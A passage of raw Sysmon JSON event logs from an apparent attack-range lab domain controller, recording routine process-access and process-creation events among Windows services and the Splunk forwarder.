05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010ECBA0200}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nTargetProcessId: 3420\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","TargetProcessId":"3420","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:48.238\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nTargetProcessId: 1308\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:48.238","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","TargetProcessId":"1308","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.177\r\nProcessGuid: {A837DB8D-03AA-5F25-0000-001057F40A00}\r\nProcessId: 4624\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.177","ProcessGuid":"{A837DB8D-03AA-5F25-0000-001057F40A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AA-5F25-0000-001057F40A00}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AA-5F25-0000-001057F40A00}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AA-5F25-0000-001057F40A00}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AA-5F25-0000-001057F40A00}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 